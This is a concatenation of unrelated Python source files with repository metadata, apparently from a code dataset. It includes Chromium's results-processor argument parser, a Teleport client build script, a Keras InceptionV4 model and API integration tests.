prog.h(input_qubit[1]) # number=18
prog.h(input_qubit[2]) # number=19
prog.h(input_qubit[3]) # number=20
prog.x(input_qubit[1]) # number=22
prog.x(input_qubit[1]) # number=23
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
key = "00000"
f = lambda rep: str(int(rep == key))
prog = make_circuit(5,f)
IBMQ.load_account()
provider = IBMQ.get_provider(hub='ibm-q')
provider.backends()
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 2 and not x.configuration().simulator and x.status().operational == True))
sample_shot =7924
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_QC1048.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.depth(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| 32.394161 | 165 | 0.623704 |
51c3ef48c338f4fd5eaaa54d7c42c14c05ef93ee | 7,950 | py | Python | tools/perf/core/results_processor/command_line.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 76 | 2020-09-02T03:05:41.000Z | 2022-03-30T04:40:55.000Z | tools/perf/core/results_processor/command_line.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 45 | 2020-09-02T03:21:37.000Z | 2022-03-31T22:19:45.000Z | tools/perf/core/results_processor/command_line.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 8 | 2020-07-22T18:49:18.000Z | 2022-02-08T10:27:16.000Z | # Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Implements the interface of the results_processor module.
Provides functions to parse command line arguments and process options.
"""
import argparse
import datetime
import logging
import os
import re
import sys
from py_utils import cloud_storage
from core.results_processor import formatters
from core.results_processor import util
def ArgumentParser(standalone=False):
"""Create an ArgumentParser defining options required by the processor."""
all_output_formats = list(formatters.FORMATTERS.keys())
if not standalone:
all_output_formats.append('none')
parser, group = _CreateTopLevelParser(standalone)
parser.add_argument(
'-v', '--verbose', action='count', dest='verbosity', default=0,
help='Increase verbosity level (repeat as needed)')
group.add_argument(
'--output-format', action='append', dest='output_formats',
metavar='FORMAT', choices=all_output_formats, required=standalone,
help=Sentences(
'Output format to produce.',
'May be used multiple times to produce multiple outputs.',
'Avaliable formats: %(choices)s.',
'' if standalone else 'Defaults to: html.'))
group.add_argument(
'--intermediate-dir', metavar='DIR_PATH', required=standalone,
help=Sentences(
'Path to a directory where intermediate results are stored.',
'' if standalone else 'If not provided, the default is to create a '
'new directory within "{output_dir}/artifacts/".'))
group.add_argument(
'--output-dir', default=_DefaultOutputDir(), metavar='DIR_PATH',
help=Sentences(
'Path to a directory where to write final results.',
'Default: %(default)s.'))
group.add_argument(
'--max-values-per-test-case', type=int, metavar='NUM',
help=Sentences(
'Fail a test run if it produces more than this number of values.'
'This includes both ad hoc and metric generated measurements.'))
group.add_argument(
'--reset-results', action='store_true',
help=Sentences(
'Overwrite any previous output files in the output directory.',
'The default is to append to existing results.'))
group.add_argument(
'--results-label', metavar='LABEL',
help='Label to identify the results generated by this run.')
group.add_argument(
'--test-path-format', metavar='FORMAT',
choices=[util.TELEMETRY_TEST_PATH_FORMAT, util.GTEST_TEST_PATH_FORMAT],
default=util.TELEMETRY_TEST_PATH_FORMAT,
help=Sentences(
'How to interpret the testPath attribute.',
'Available options: %(choices)s. Default: %(default)s.'))
group.add_argument(
'--trace-processor-path',
help=Sentences('Path to trace processor shell.',
'Default: download a pre-built version from the cloud.'))
group.add_argument(
'--upload-results', action='store_true',
help='Upload generated artifacts to cloud storage.')
group.add_argument(
'--upload-bucket', default='output', metavar='BUCKET',
help=Sentences(
'Storage bucket to use for uploading artifacts.',
'Supported values are: %s; or a valid cloud storage bucket name.'
% ', '.join(sorted(cloud_storage.BUCKET_ALIASES)),
'Defaults to: %(default)s.'))
group.add_argument(
'--experimental-tbmv3-metrics', action='store_true',
help='Enable running experimental TBMv3 metrics.')
group.add_argument(
'--fetch-power-profile',
action='store_true',
help=('Specify this if you want to run proxy power metrics that use '
'device power profiles.'))
group.add_argument(
'--extra-metric', action='append', dest='extra_metrics', metavar='METRIC',
help=('Compute an extra metric on the test results. Metric should have '
'the form "version:name", e.g. "tbmv3:power_rails_metric". '
'Can be used multiple times.'))
group.add_argument(
'--is-unittest',
action='store_true',
help='Is running inside a unittest.')
group.add_argument(
'--fetch-device-data',
action='store_true',
help='Android-specific argument to enable fetching data from a device.')
group.add_argument(
'--device-data-path',
dest='device_data_path',
help=('Android-specific argument for --fetch-data-device. Use this to '
'specify the path on device to pull data from using adb.'))
group.add_argument(
'--local-data-path',
dest='local_data_path',
default=os.environ.get('ISOLATED_OUTDIR'),
help=('Android-specific argument for --fetch-data-device. Use this to '
'override the local copy path. Defaults to ISOLATED_OUTDIR '
'environment variable.'))
return parser
def ProcessOptions(options):
"""Adjust result processing options as needed before running benchmarks.
Note: The intended scope of this function is limited to only adjust options
defined by the ArgumentParser above. One should not attempt to read or modify
any other attributes that the options object may have.
Currently the main job of this function is to tease out and separate output
formats to be handled by the results processor, from those that should fall
back to the legacy output formatters in Telemetry.
Args:
options: An options object with values parsed from the command line.
"""
if options.verbosity >= 2:
logging.getLogger().setLevel(logging.DEBUG)
elif options.verbosity == 1:
logging.getLogger().setLevel(logging.INFO)
else:
logging.getLogger().setLevel(logging.WARNING)
# The output_dir option is None or missing if the selected Telemetry command
# does not involve output generation, e.g. "run_benchmark list", and the
# argument parser defined above was not invoked.
if getattr(options, 'output_dir', None) is None:
return
def resolve_dir(path):
return os.path.realpath(os.path.expanduser(path))
options.output_dir = resolve_dir(options.output_dir)
if options.intermediate_dir:
options.intermediate_dir = resolve_dir(options.intermediate_dir)
else:
if options.results_label:
filesafe_label = re.sub(r'\W+', '_', options.results_label)
else:
filesafe_label = 'run'
start_time = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')
options.intermediate_dir = os.path.join(
options.output_dir, 'artifacts', '%s_%s' % (filesafe_label, start_time))
if options.upload_results:
options.upload_bucket = cloud_storage.BUCKET_ALIASES.get(
options.upload_bucket, options.upload_bucket)
else:
options.upload_bucket = None
if not options.output_formats:
options.output_formats = ['html']
else:
options.output_formats = sorted(set(options.output_formats))
if 'none' in options.output_formats:
options.output_formats.remove('none')
def _CreateTopLevelParser(standalone):
"""Create top level parser, and group for result options."""
if standalone:
parser = argparse.ArgumentParser(
description='Standalone command line interface to results_processor.')
# In standalone mode, both the parser and group are the same thing.
return parser, parser
else:
parser = argparse.ArgumentParser(add_help=False)
group = parser.add_argument_group(title='Result processor options')
return parser, group
def _DefaultOutputDir():
"""Default output directory.
Points to the directory of the benchmark runner script, if found, or the
current working directory otherwise.
"""
main_module = sys.modules['__main__']
if hasattr(main_module, '__file__'):
return os.path.realpath(os.path.dirname(main_module.__file__))
else:
return os.getcwd()
def Sentences(*args):
return ' '.join(s for s in args if s)
| 38.592233 | 80 | 0.69673 |
da84c603ef3231977a96c020227ad4964a69345c | 9,777 | py | Python | build/builder/build-assist.py | zhoulhb/teleport | 54da194697898ef77537cfe7032d774555dc1335 | [
"Apache-2.0"
] | 3 | 2019-02-18T09:14:37.000Z | 2019-07-30T08:40:21.000Z | build/builder/build-assist.py | zhoulhb/teleport | 54da194697898ef77537cfe7032d774555dc1335 | [
"Apache-2.0"
] | null | null | null | build/builder/build-assist.py | zhoulhb/teleport | 54da194697898ef77537cfe7032d774555dc1335 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from core import colorconsole as cc
from core import utils
from core.ver import *
from core.context import *
from core.env import env
ctx = BuildContext()
class BuilderBase:
def __init__(self):
self.out_dir = ''
def build_exe(self):
pass
def build_rdp(self):
pass
def build_installer(self):
pass
class BuilderWin(BuilderBase):
def __init__(self):
super().__init__()
def build_exe(self):
cc.i('build tp_assist...')
sln_file = os.path.join(env.root_path, 'client', 'tp_assist_win', 'tp_assist.vs2017.sln')
out_file = os.path.join(env.root_path, 'out', 'client', ctx.bits_path, ctx.target_path, 'tp_assist.exe')
if os.path.exists(out_file):
utils.remove(out_file)
utils.msvc_build(sln_file, 'tp_assist', ctx.target_path, ctx.bits_path, False)
utils.ensure_file_exists(out_file)
# def build_rdp(self):
# cc.n('build tp_rdp...')
# sln_file = os.path.join(ROOT_PATH, 'client', 'tp_rdp', 'tp_rdp.2015.sln')
# out_file = os.path.join(ROOT_PATH, 'out', 'client', ctx.bits_path, ctx.target_path, 'tp_rdp.exe')
# if os.path.exists(out_file):
# utils.remove(out_file)
# utils.msvc_build(sln_file, 'tp_rdp', ctx.target_path, ctx.bits_path, False)
# utils.ensure_file_exists(out_file)
def build_installer(self):
cc.i('build assist installer...')
name = 'teleport-assist-{}-{}'.format(ctx.dist, VER_TP_ASSIST)
out_path = os.path.join(env.root_path, 'out', 'installer')
utils.makedirs(out_path)
out_file = os.path.join(out_path, '{}.exe'.format(name))
utils.remove(out_file)
self._build_installer()
utils.ensure_file_exists(out_file)
@staticmethod
def _build_installer():
tmp_path = os.path.join(env.root_path, 'dist', 'client', 'windows', 'assist')
tmp_app_path = os.path.join(tmp_path, 'apps')
tmp_cfg_path = os.path.join(tmp_app_path, 'cfg')
if os.path.exists(tmp_app_path):
utils.remove(tmp_app_path)
utils.makedirs(tmp_app_path)
utils.makedirs(tmp_cfg_path)
utils.copy_file(os.path.join(env.root_path, 'out', 'client', ctx.bits_path, ctx.target_path), tmp_app_path, 'tp_assist.exe')
utils.copy_file(os.path.join(env.root_path, 'client', 'cfg'), tmp_cfg_path, ('tp-assist.windows.json', 'tp-assist.json'))
utils.copy_file(os.path.join(env.root_path, 'client', 'cfg'), tmp_cfg_path, 'cacert.cer')
utils.copy_file(os.path.join(env.root_path, 'client', 'cfg'), tmp_cfg_path, 'localhost.key')
utils.copy_file(os.path.join(env.root_path, 'client', 'cfg'), tmp_cfg_path, 'localhost.pem')
utils.copy_ex(os.path.join(env.root_path, 'client', 'tp_assist_win'), tmp_app_path, 'site')
utils.makedirs(os.path.join(tmp_app_path, 'tools', 'putty'))
utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'putty'), os.path.join(tmp_app_path, 'tools', 'putty'), 'putty.exe')
utils.makedirs(os.path.join(tmp_app_path, 'tools', 'winscp'))
utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'winscp'), os.path.join(tmp_app_path, 'tools', 'winscp'), 'WinSCP.exe')
utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'winscp'), os.path.join(tmp_app_path, 'tools', 'winscp'), 'license.txt')
utils.makedirs(os.path.join(tmp_app_path, 'tools', 'tprdp'))
utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'tprdp-client.exe')
utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'tprdp-replay.exe')
utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'libeay32.dll')
utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'ssleay32.dll')
utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'msvcr120.dll')
utils.copy_file(os.path.join(env.root_path, 'client', 'tools'), os.path.join(tmp_app_path, 'tools'), 'securecrt-telnet.vbs')
utils.nsis_build(os.path.join(env.root_path, 'dist', 'client', 'windows', 'assist', 'installer.nsi'))
class BuilderMacOS(BuilderBase):
def __init__(self):
super().__init__()
def build_exe(self):
cc.i('build tp_assist...')
configuration = ctx.target_path.capitalize()
proj_file = os.path.join(env.root_path, 'client', 'tp_assist_macos', 'TP-Assist.xcodeproj')
out_file = os.path.join(env.root_path, 'client', 'tp_assist_macos', 'build', configuration, 'TP-Assist.app')
if os.path.exists(out_file):
utils.remove(out_file)
utils.xcode_build(proj_file, 'TP-Assist', configuration, False)
utils.ensure_file_exists(os.path.join(out_file, 'Contents', 'Info.plist'))
def build_installer(self):
cc.i('make tp_assist dmg file...')
json_file = os.path.join(env.root_path, 'dist', 'client', 'macos', 'dmg.json')
dmg_file = os.path.join(env.root_path, 'out', 'client', 'macos', 'teleport-assist-macos-{}.dmg'.format(VER_TP_ASSIST))
if os.path.exists(dmg_file):
utils.remove(dmg_file)
utils.make_dmg(json_file, dmg_file)
utils.ensure_file_exists(dmg_file)
@staticmethod
def _build_installer():
return
# tmp_path = os.path.join(env.root_path, 'dist', 'client', 'windows', 'assist')
# tmp_app_path = os.path.join(tmp_path, 'apps')
# tmp_cfg_path = os.path.join(tmp_app_path, 'cfg')
#
# if os.path.exists(tmp_app_path):
# utils.remove(tmp_app_path)
#
# utils.makedirs(tmp_app_path)
# utils.makedirs(tmp_cfg_path)
#
# utils.copy_file(os.path.join(env.root_path, 'out', 'client', ctx.bits_path, ctx.target_path), tmp_app_path, 'tp_assist.exe')
# utils.copy_file(os.path.join(env.root_path, 'client', 'tp_assist_win', 'cfg'), tmp_cfg_path, ('tp-assist.default.json', 'tp-assist.json'))
#
# utils.copy_ex(os.path.join(env.root_path, 'client', 'tp_assist_win'), tmp_app_path, 'site')
#
# utils.makedirs(os.path.join(tmp_app_path, 'tools', 'putty'))
# utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'putty'), os.path.join(tmp_app_path, 'tools', 'putty'), 'putty.exe')
#
# utils.makedirs(os.path.join(tmp_app_path, 'tools', 'winscp'))
# utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'winscp'), os.path.join(tmp_app_path, 'tools', 'winscp'), 'WinSCP.exe')
# utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'winscp'), os.path.join(tmp_app_path, 'tools', 'winscp'), 'license.txt')
#
# utils.makedirs(os.path.join(tmp_app_path, 'tools', 'tprdp'))
# utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'tprdp-client.exe')
# utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'tprdp-replay.exe')
# utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'libeay32.dll')
# utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'ssleay32.dll')
# utils.copy_file(os.path.join(env.root_path, 'client', 'tools', 'tprdp'), os.path.join(tmp_app_path, 'tools', 'tprdp'), 'msvcr120.dll')
#
# utils.copy_file(os.path.join(env.root_path, 'client', 'tools'), os.path.join(tmp_app_path, 'tools'), 'securecrt-telnet.vbs')
#
# utils.nsis_build(os.path.join(env.root_path, 'dist', 'client', 'windows', 'assist', 'installer.nsi'))
class BuilderLinux(BuilderBase):
def __init__(self):
super().__init__()
def build_exe(self):
cc.e('not support linux.')
# def build_rdp(self):
# cc.e('not support linux.')
def build_installer(self):
cc.e('not support linux.')
def gen_builder(dist):
if dist == 'windows':
builder = BuilderWin()
elif dist == 'macos':
builder = BuilderMacOS()
elif dist == 'linux':
builder = BuilderLinux()
else:
raise RuntimeError('unsupported platform.')
ctx.set_dist(dist)
return builder
def main():
if not env.init():
return
builder = None
argv = sys.argv[1:]
for i in range(len(argv)):
if 'debug' == argv[i]:
ctx.set_target(TARGET_DEBUG)
elif 'x86' == argv[i]:
ctx.set_bits(BITS_32)
elif 'x64' == argv[i]:
ctx.set_bits(BITS_64)
elif argv[i] in ctx.dist_all:
builder = gen_builder(argv[i])
if builder is None:
builder = gen_builder(ctx.host_os)
if 'exe' in argv:
builder.build_exe()
# elif 'rdp' in argv:
# builder.build_rdp()
elif 'installer' in argv:
builder.build_installer()
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
pass
except RuntimeError as e:
cc.e(e.__str__())
except:
cc.f('got exception.')
| 41.782051 | 149 | 0.615935 |
2c31f439e5d1a4880464007ba2fe3ff47e96aaa7 | 455 | py | Python | testproj/people/models.py | gdalmau/drf-yasg | acff90ac26eba01e363bfd3ecc75b71a6a37088a | [
"BSD-3-Clause"
] | 65 | 2020-10-06T15:37:49.000Z | 2022-02-24T05:18:28.000Z | testproj/people/models.py | gdalmau/drf-yasg | acff90ac26eba01e363bfd3ecc75b71a6a37088a | [
"BSD-3-Clause"
] | 48 | 2020-10-07T11:14:40.000Z | 2021-02-03T15:07:39.000Z | testproj/people/models.py | gdalmau/drf-yasg | acff90ac26eba01e363bfd3ecc75b71a6a37088a | [
"BSD-3-Clause"
] | 4 | 2020-10-10T18:03:33.000Z | 2020-10-23T07:56:34.000Z | from django.db import models
from django.utils.safestring import mark_safe
class Identity(models.Model):
first_name = models.CharField(max_length=30, null=True)
last_name = models.CharField(
max_length=30,
null=True,
help_text=mark_safe("<strong>Here's some HTML!</strong>"),
)
class Person(models.Model):
identity = models.OneToOneField(
Identity, related_name="person", on_delete=models.PROTECT
)
| 25.277778 | 66 | 0.696703 |
44885e97fba996d73ce0ac7c398d95e567adefc2 | 662 | py | Python | Mundo 3/Exercicios/Desafio115/cadastro/ui/__init__.py | yWolfBR/Python-CursoEmVideo | 17bab8ad3c4293daf8377c5d49242942845b3577 | [
"MIT"
] | null | null | null | Mundo 3/Exercicios/Desafio115/cadastro/ui/__init__.py | yWolfBR/Python-CursoEmVideo | 17bab8ad3c4293daf8377c5d49242942845b3577 | [
"MIT"
] | null | null | null | Mundo 3/Exercicios/Desafio115/cadastro/ui/__init__.py | yWolfBR/Python-CursoEmVideo | 17bab8ad3c4293daf8377c5d49242942845b3577 | [
"MIT"
] | null | null | null | def showline():
return '-' * 50
def header(txt):
print(f'{showline()}\n{txt:^50}\n{showline()}')
def leiaint(txt):
while True:
try:
n = int(input(txt))
except (ValueError, TypeError):
print('ERRO! Digite um número inteiro válido!')
except KeyboardInterrupt:
print('O usuário preferiu não digitar')
return 0
else:
return n
def leiastr(txt):
t = str(input(txt)).strip()
return t
def cmenu(lst):
header('MENU PRINCIPAL')
for i, v in enumerate(lst):
print(f'{i + 1} - {v}')
print(showline())
return leiaint('Sua Opção: ')
| 20.060606 | 59 | 0.542296 |
bb624269990a68189f4fef67b8b4425a7155e2d9 | 9,847 | py | Python | inceptionv4.py | theroyakash/InceptionV4 | ba21f3246503fe40343bea599ad5f94755fc1b65 | [
"Apache-2.0"
] | null | null | null | inceptionv4.py | theroyakash/InceptionV4 | ba21f3246503fe40343bea599ad5f94755fc1b65 | [
"Apache-2.0"
] | null | null | null | inceptionv4.py | theroyakash/InceptionV4 | ba21f3246503fe40343bea599ad5f94755fc1b65 | [
"Apache-2.0"
] | null | null | null | '''
Copyright 2020 TensorFlow Authors and theroyakash
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import numpy as np
import tensorFlow as tf
from tensorFlow import keras
# Sys
import warnings
# Keras Core
from keras.layers.convolutional import MaxPooling2D, Convolution2D, AveragePooling2D
from keras.layers import Input, Dropout, Dense, Flatten, Activation
from keras.layers.normalization import BatchNormalization
from keras.layers.merge import concatenate
from keras import regularizers
from keras import initializers
from keras.models import Model
# Backend
from keras import backend as K
# Utils
from keras.utils.layer_utils import convert_all_kernels_in_model
from keras.utils.data_utils import get_file
# Implements the Inception Network v4 (http://arxiv.org/pdf/1602.07261v1.pdf) in Keras.
WEIGHTS_PATH = 'data coming soon'
WEIGHTS_PATH_NO_TOP = 'link coming soon'
def preprocess_input(x):
x = np.divide(x, 255.0)
x = np.subtract(x, 0.5)
x = np.multiply(x, 2.0)
return x
def conv2d_bn(x, nb_filter, num_row, num_col,
padding='same', strides=(1, 1), use_bias=False):
"""
Utility function to apply conv + BN.
(Slightly modified from https://github.com/fchollet/keras/blob/master/keras/applications/inception_v3.py)
"""
if K.image_data_format() == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
x = Convolution2D(nb_filter, (num_row, num_col),
strides=strides,
padding=padding,
use_bias=use_bias,
kernel_regularizer=regularizers.l2(0.00004),
kernel_initializer=initializers.VarianceScaling(scale=2.0, mode='fan_in', distribution='normal', seed=None))(x)
x = BatchNormalization(axis=channel_axis, momentum=0.9997, scale=False)(x)
x = Activation('relu')(x)
return x
def block_inception_a(input):
if K.image_data_format() == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
branch_0 = conv2d_bn(input, 96, 1, 1)
branch_1 = conv2d_bn(input, 64, 1, 1)
branch_1 = conv2d_bn(branch_1, 96, 3, 3)
branch_2 = conv2d_bn(input, 64, 1, 1)
branch_2 = conv2d_bn(branch_2, 96, 3, 3)
branch_2 = conv2d_bn(branch_2, 96, 3, 3)
branch_3 = AveragePooling2D((3,3), strides=(1,1), padding='same')(input)
branch_3 = conv2d_bn(branch_3, 96, 1, 1)
x = concatenate([branch_0, branch_1, branch_2, branch_3], axis=channel_axis)
return x
def block_reduction_a(input):
if K.image_data_format() == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
branch_0 = conv2d_bn(input, 384, 3, 3, strides=(2,2), padding='valid')
branch_1 = conv2d_bn(input, 192, 1, 1)
branch_1 = conv2d_bn(branch_1, 224, 3, 3)
branch_1 = conv2d_bn(branch_1, 256, 3, 3, strides=(2,2), padding='valid')
branch_2 = MaxPooling2D((3,3), strides=(2,2), padding='valid')(input)
x = concatenate([branch_0, branch_1, branch_2], axis=channel_axis)
return x
def block_inception_b(input):
if K.image_data_format() == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
branch_0 = conv2d_bn(input, 384, 1, 1)
branch_1 = conv2d_bn(input, 192, 1, 1)
branch_1 = conv2d_bn(branch_1, 224, 1, 7)
branch_1 = conv2d_bn(branch_1, 256, 7, 1)
branch_2 = conv2d_bn(input, 192, 1, 1)
branch_2 = conv2d_bn(branch_2, 192, 7, 1)
branch_2 = conv2d_bn(branch_2, 224, 1, 7)
branch_2 = conv2d_bn(branch_2, 224, 7, 1)
branch_2 = conv2d_bn(branch_2, 256, 1, 7)
branch_3 = AveragePooling2D((3,3), strides=(1,1), padding='same')(input)
branch_3 = conv2d_bn(branch_3, 128, 1, 1)
x = concatenate([branch_0, branch_1, branch_2, branch_3], axis=channel_axis)
return x
def block_reduction_b(input):
if K.image_data_format() == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
branch_0 = conv2d_bn(input, 192, 1, 1)
branch_0 = conv2d_bn(branch_0, 192, 3, 3, strides=(2, 2), padding='valid')
branch_1 = conv2d_bn(input, 256, 1, 1)
branch_1 = conv2d_bn(branch_1, 256, 1, 7)
branch_1 = conv2d_bn(branch_1, 320, 7, 1)
branch_1 = conv2d_bn(branch_1, 320, 3, 3, strides=(2,2), padding='valid')
branch_2 = MaxPooling2D((3, 3), strides=(2, 2), padding='valid')(input)
x = concatenate([branch_0, branch_1, branch_2], axis=channel_axis)
return x
def block_inception_c(input):
if K.image_data_format() == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
branch_0 = conv2d_bn(input, 256, 1, 1)
branch_1 = conv2d_bn(input, 384, 1, 1)
branch_10 = conv2d_bn(branch_1, 256, 1, 3)
branch_11 = conv2d_bn(branch_1, 256, 3, 1)
branch_1 = concatenate([branch_10, branch_11], axis=channel_axis)
branch_2 = conv2d_bn(input, 384, 1, 1)
branch_2 = conv2d_bn(branch_2, 448, 3, 1)
branch_2 = conv2d_bn(branch_2, 512, 1, 3)
branch_20 = conv2d_bn(branch_2, 256, 1, 3)
branch_21 = conv2d_bn(branch_2, 256, 3, 1)
branch_2 = concatenate([branch_20, branch_21], axis=channel_axis)
branch_3 = AveragePooling2D((3, 3), strides=(1, 1), padding='same')(input)
branch_3 = conv2d_bn(branch_3, 256, 1, 1)
x = concatenate([branch_0, branch_1, branch_2, branch_3], axis=channel_axis)
return x
def inception_v4_base(input):
if K.image_data_format() == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
# Input Shape is 299 x 299 x 3 (th) or 3 x 299 x 299 (th)
net = conv2d_bn(input, 32, 3, 3, strides=(2,2), padding='valid')
net = conv2d_bn(net, 32, 3, 3, padding='valid')
net = conv2d_bn(net, 64, 3, 3)
branch_0 = MaxPooling2D((3,3), strides=(2,2), padding='valid')(net)
branch_1 = conv2d_bn(net, 96, 3, 3, strides=(2,2), padding='valid')
net = concatenate([branch_0, branch_1], axis=channel_axis)
branch_0 = conv2d_bn(net, 64, 1, 1)
branch_0 = conv2d_bn(branch_0, 96, 3, 3, padding='valid')
branch_1 = conv2d_bn(net, 64, 1, 1)
branch_1 = conv2d_bn(branch_1, 64, 1, 7)
branch_1 = conv2d_bn(branch_1, 64, 7, 1)
branch_1 = conv2d_bn(branch_1, 96, 3, 3, padding='valid')
net = concatenate([branch_0, branch_1], axis=channel_axis)
branch_0 = conv2d_bn(net, 192, 3, 3, strides=(2,2), padding='valid')
branch_1 = MaxPooling2D((3,3), strides=(2,2), padding='valid')(net)
net = concatenate([branch_0, branch_1], axis=channel_axis)
# 35 x 35 x 384
# 4 x Inception-A blocks
for idx in range(4):
net = block_inception_a(net)
# 35 x 35 x 384
# Reduction-A block
net = block_reduction_a(net)
# 17 x 17 x 1024
# 7 x Inception-B blocks
for idx in range(7):
net = block_inception_b(net)
# 17 x 17 x 1024
# Reduction-B block
net = block_reduction_b(net)
# 8 x 8 x 1536
# 3 x Inception-C blocks
for idx in range(3):
net = block_inception_c(net)
return net
def inception_v4(num_classes, dropout_keep_prob, weights, include_top):
'''
Creates the inception v4 network
Args:
num_classes: number of classes
dropout_keep_prob: float, the fraction to keep before final layer.
Returns:
logits: the logits outputs of the model.
'''
# Input Shape is 299 x 299 x 3 (tf) or 3 x 299 x 299 (th)
if K.image_data_format() == 'channels_first':
inputs = Input((3, 299, 299))
else:
inputs = Input((299, 299, 3))
# Make inception base
x = inception_v4_base(inputs)
# Final pooling and prediction
if include_top:
# 1 x 1 x 1536
x = AveragePooling2D((8,8), padding='valid')(x)
x = Dropout(dropout_keep_prob)(x)
x = Flatten()(x)
# 1536
x = Dense(units=num_classes, activation='softmax')(x)
model = Model(inputs, x, name='inception_v4')
# load weights
if weights == 'imagenet':
if K.image_data_format() == 'channels_first':
if K.backend() == 'tensorflow':
warnings.warn('You are using the TensorFlow backend, yet you '
'are using the Theano '
'image data format convention '
'(`image_data_format="channels_first"`). '
'For best performance, set '
'`image_data_format="channels_last"` in '
'your Keras config '
'at ~/.keras/keras.json.')
if include_top:
weights_path = get_file(
'inception-v4_weights_tf_dim_ordering_tf_kernels.h5',
WEIGHTS_PATH,
cache_subdir='models',
md5_hash='9fe79d77f793fe874470d84ca6ba4a3b')
else:
weights_path = get_file(
'inception-v4_weights_tf_dim_ordering_tf_kernels_notop.h5',
WEIGHTS_PATH_NO_TOP,
cache_subdir='models',
md5_hash='9296b46b5971573064d12e4669110969')
model.load_weights(weights_path, by_name=True)
return model
def create_model(num_classes=1001, dropout_prob=0.2, weights=None, include_top=True):
return inception_v4(num_classes, dropout_prob, weights, include_top)
| 32.391447 | 133 | 0.643242 |
d54673b297fc0493bc7cb50661d05eecdfcc3a7a | 2,055 | py | Python | inttests/channel_routes_test.py | andrew-boutin/dndtextapi | 4af1af9b9424baf64f7f45db394467e8344ae21e | [
"RSA-MD"
] | 3 | 2018-07-26T12:48:12.000Z | 2018-08-16T01:00:05.000Z | inttests/channel_routes_test.py | andrew-boutin/dndtextapi | 4af1af9b9424baf64f7f45db394467e8344ae21e | [
"RSA-MD"
] | null | null | null | inttests/channel_routes_test.py | andrew-boutin/dndtextapi | 4af1af9b9424baf64f7f45db394467e8344ae21e | [
"RSA-MD"
] | null | null | null | # Copyright (C) 2018, Baking Bits Studios - All Rights Reserved
import requests, json
from base import TestBase
# TODO: Created, Delete
class TestChannelRoutes(TestBase):
def setup_method(self, test_method):
super(TestChannelRoutes, self).setup_method(test_method)
self.url = f"{self.base}/channels"
def teardown_method(self, test_method):
super(TestChannelRoutes, self).teardown_method(test_method)
def test_get_channels(self):
cookies = self.get_authn_cookies_user_normal()
r = requests.get(self.url, headers=self.read_headers, cookies=cookies)
assert 200 == r.status_code
# TODO: At least one, verify fields, etc.
# [{"Name":"my public channel","Description":"my public channel description","Topic":"some topic","ID":1,"OwnerID":1,"IsPrivate":false,"CreatedOn":"2018-07-24T20:02:49.089425Z","LastUpdated":"2018-07-24T20:02:49.089425Z","DMID":1},{"Name":"my private channel","Description":"my private channel description","Topic":"","ID":2,"OwnerID":1,"IsPrivate":true,"CreatedOn":"2018-07-24T20:02:49.089425Z","LastUpdated":"2018-07-24T20:02:49.089425Z","DMID":1}]
def test_update_channel(self,
create_channel_normal_user):
cookies = self.get_authn_cookies_user_normal()
channel_id = create_channel_normal_user['ID']
url = self.url + f'/{channel_id}'
data = create_channel_normal_user
data['Topic'] = 'Updated topic'
data = json.dumps(data)
r = requests.put(url, data=data, headers=self.read_write_headers, cookies=cookies)
assert 200 == r.status_code
assert 'Updated topic' == r.json()['Topic']
def test_get_channel(self,
